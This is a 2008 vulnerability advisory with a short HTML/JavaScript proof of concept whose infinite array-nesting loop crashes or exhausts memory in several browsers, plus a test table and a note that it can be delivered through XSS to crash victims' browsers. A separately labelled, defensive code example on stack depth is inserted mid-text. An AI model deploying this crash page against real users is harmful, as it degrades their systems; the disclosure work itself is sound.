##################################################
Multiple Browsers Stack overflow in javascript with infinite array
original article: http://lostmon.blogspot.com/2008/11/multiple-browsers-stack-overflow-in.html
##################################################

############
Description
############

Multiple browsers are vulnerable to a stack overflow or crash via an infinite array in the JavaScript engine. This is extended research based on this vulnerability/exploit: http://www.securityfocus.com/bid/31703

This issue can be used, for example, in a web post vulnerable to XSS-style attacks or similar to carry out a DoS from the web against the victims' browsers.

################
Browsers Tested:
################

Fail = affected
pass = Not affected
¿?

#####################
Testing
#####################

.:[-Multiple Browsers infinite array PoC By Lostmon -]:.

Here you have two variants of this array; save this file:

#####################################
<html>
<head>
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>
<script type="text/javascript">
function infinite_array() {
  foo = new Array();
  alert('infinite array');
  while(true) { foo = new Array(foo); }
}
function infinite_array2() {
  foo = new Array();
  alert('Infinite array with sort()');
  while(true) { foo = new Array(foo).sort(); }
}
</script>
</head>
<body>
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>
<input type="button" value="Infinite array Without sort()" onclick="infinite_array();" />
<input type="button" value="Infinite array with sort()" onclick="infinite_array2();" />
</body>
</html>
####################################

See table image: http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF

###############
Stack Overflow
###############

In IE7, Avant Browser and Maxthon this causes a stack overflow in JavaScript. In IE7 I tried to trace and exploit it with OllyDbg, but in all the cases I tested to make it executable, execution always ended up in SEH.
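The stack-exhaustion mechanism behind the PoC, shown as an added example that is not part of Lostmon's advisory: a bounded version of the PoC's `foo = new Array(foo)` loop, a recursive depth walk that runs out of call stack on deep nesting, and an explicit-stack walk with a depth limit that does not. The function names are mine; whether the browser engines of the time failed in exactly this way is not asserted here, only that any recursive routine walking such a structure needs one frame per nesting level.

```javascript
// Added example, not from Lostmon's advisory. A bounded version of the PoC's
// `foo = new Array(foo)` loop, plus two ways to measure the nesting it builds.
// A recursive walk needs one call frame per nesting level and so exhausts the
// stack (a RangeError in modern engines); a heap-allocated work stack does not,
// and a depth limit lets untrusted nesting be rejected before it is processed.

// Wrap an empty array `wraps` times. `new Array(x)` with a non-numeric
// argument yields the one-element array [x], which is what the PoC relies on.
function buildNested(wraps) {
  let foo = new Array();
  for (let i = 0; i < wraps; i++) {
    foo = new Array(foo);
  }
  return foo;
}

// Naive recursive depth: [] is depth 1, [[]] is depth 2, and so on.
function nestingDepthRecursive(node) {
  if (!Array.isArray(node)) return 0;
  let deepest = 0;
  for (const child of node) {
    deepest = Math.max(deepest, nestingDepthRecursive(child));
  }
  return deepest + 1;
}

// Same measurement with an explicit work stack on the heap. Returns null as
// soon as the nesting exceeds `maxDepth`, so oversized input is rejected early.
function nestingDepth(root, maxDepth = Infinity) {
  let deepest = 0;
  const work = [[root, 1]];
  while (work.length > 0) {
    const [node, depth] = work.pop();
    if (!Array.isArray(node)) continue;
    if (depth > maxDepth) return null;
    if (depth > deepest) deepest = depth;
    for (const child of node) work.push([child, depth + 1]);
  }
  return deepest;
}

// True if the recursive walk completes for `wraps` levels, false if the
// engine aborts it with "Maximum call stack size exceeded".
function recursiveWalkSurvives(wraps) {
  try {
    nestingDepthRecursive(buildNested(wraps));
    return true;
  } catch (err) {
    if (err instanceof RangeError) return false;
    throw err;
  }
}
```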
The crash is not exploitable, and when the alert is dismissed the browser continues working without problems, so this is a recoverable issue. The Microsoft security team has determined that, at this moment, this issue is not exploitable.

In Google Chrome it can cause a tab crash. If only one window with one tab is open, opening the exploit and, without waiting, trying to navigate to Google or another site causes Google Chrome to close without any warning, error or alert. If multiple tabs are open, this issue only crashes/closes the tab affected by the exploit. If you open the exploit and wait a few seconds, Chrome shows a warning to close the crashed tab.

################
Memory abuse
################

In IE7 it can cause memory abuse that makes the whole system and all applications unstable (it can consume all memory).

In Safari for Windows it can cause program termination: Safari closes all windows and all tabs without an alert, warning or error. With OllyDbg it can be traced, and it too is a stack overflow.

In Google Chrome it can cause a tab crash. If only one window with one tab is open, opening the exploit and, without waiting, trying to navigate to Google or another site causes Google Chrome to close without any warning, error or alert. If you open the exploit and wait a few seconds, Chrome shows a warning to close the crashed tab.

Some other browsers detect the slow script and ask whether to stop it.

In Opera it abuses memory, but we can recover or navigate to other sites, so this is a recoverable issue.

#######################End#####################

Thanks to the Microsoft security team for their support & interest.
Thanks to the Apple security team for their support & interest.
--
Thanks to Estrella for being my light
Thanks to FalconDeOro for his support
Thanks to Imydes from http://www.imydes.com
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....